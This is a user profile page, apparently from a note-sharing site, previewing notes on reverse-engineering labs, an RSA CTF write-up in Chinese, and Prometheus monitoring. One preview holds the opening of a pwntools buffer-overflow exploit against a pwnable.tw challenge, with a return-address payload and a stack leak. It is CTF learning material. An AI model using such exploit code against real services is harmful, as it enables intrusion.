wxrdnx

@wxrdnx

Joined on Jul 16, 2020

  • 下載項目 Virtual Box IDA Freeware Detect it Easy x64dbg 匯入VM 開啟 Virtualbox
     Like  Bookmark
  • This lab is similar to lab4, except that the binary is a PE64 executable. The source code is the same except for the flag, so the debugging procedure is similar to lab4 Launch x64dbg. Press File > Open Choose lab5.exe and start debugging Now you need to find the main function. You can throw this executable into IDA and find the main address at the Function bar on the left side. main calls two functions: initialize and real_routine. According to lab4, you'll probably want to look into real_routine, which is located at 0x4015BD.
     Like  Bookmark
  • Use the file command (on Linux) or Detect it Easy (on Windows) to identify the program type. The file command (Linux): Detect it Easy (Windows): The above evidence suggests that lab1 is written in Go. Use the strings command or Detect it Easy to find the hidden flag.
     Like  Bookmark
  • gcc lab0.c -o rick gcc lab0.c -c -o rick.o gcc lab0.c -g -c -o rick-dbg.o
     Like  Bookmark
  • start from pwn import * rem = remote('chall.pwnable.tw', 10000) rem.recvuntil(':') line = b'A' * 20 + p32(0x8048087) rem.send(line) stack_addr = rem.recv()[0:4]
     Like  Bookmark
  • 資工四 B06902031 何承勳 wxrdnx RSA 本題 RSA 的 $N$ 是 3 個質數相乘得到的。第一個質數 $2p$ 是隨機產生的 512 bit 質數,第二個質數 $q1$ 是比 $2p$ 還大的下一個質數,第三個質數 $q2$ 是比 $3q1$ 還大的下一個質數。由於選取質數的方法是選擇下個比它大的質數,因此 $q3 - 2p$,$q2 - 3q1$ 的值會很小。也就是說,我們可以假設 $q1 = 2p + e1$, $q2 = 3 * q1 + e2$,其中 $e1$,$e2$ 是很小的數。這樣一來,我們可以選擇暴力猜測 $e1$ 和 $e2$,那我們的方程式就會是: $N = p \cdot q1 \cdot q2 = p \cdot (2p + e1) \cdot (3q1 + e2) = p \cdot (2p + e1) \cdot (3 \cdot (2p + e1) + e2)$ 這格方程式的未知數就會只剩下 p 。隨後,我們將方程式帶進 sage 解看看,如果解的出來的話,那個 root 的值就是 p 了。一旦 p 解出來後,q1 & q2 也解出來了,我們可以近一步得到 ϕ,然後取得私鑰 d 還原原文。 script sage -python3 rsa.py
     Like  Bookmark
  • Prometheus Overview B06902031 資工四 何承勳 Outline Introduction Architecture Components Prometheus Server
     Like  Bookmark
  • Introduction In cloud environment, there is no fixed monitoring target, and nearly every monitored object in the cloud changes dynamically. Thus, Prometheus cannot statically monitor every device in the cloud. The solution is to introduce an intermediate agent. This agent has access to all current monitored targets. Prometheus only needs to ask the agent what monitoring targets there are. Such mechanism is called service discovery. Intorduction to Kubernetes Overview Kubenetes is an open source container orchestration tool developed by Google Kubernetes regards a series of hosts as a large amount of managed resources, which form a cloud operating system that can be easily expanded. Each container running in Kubernetes can be regarded as a process running in the cloud operating system.
     Like  Bookmark
  • Introduction Architecture Overview Prometheus Server TSDB Prometheus consists of a TSDB (time series database). TSDB is a database optimized for handling time series data. Specifically, Prometheus stores value that belong to the same metric by time series. Each value consists of three parts: metric, value and timestamp (in ms). The metric name specifies the feature of a system that is measured. For instance, the http_requests_total metric aggregate the total number of HTTP requests received. The label is used to identify different dimensions of the same time series. For example, prometheus_http_request_total{method="Get"} indicates the number of all HTTP Get Requests, so prometheus_http_request_total{method="Post"} is another new metric that accumulates the number of Post Requests
     Like  Bookmark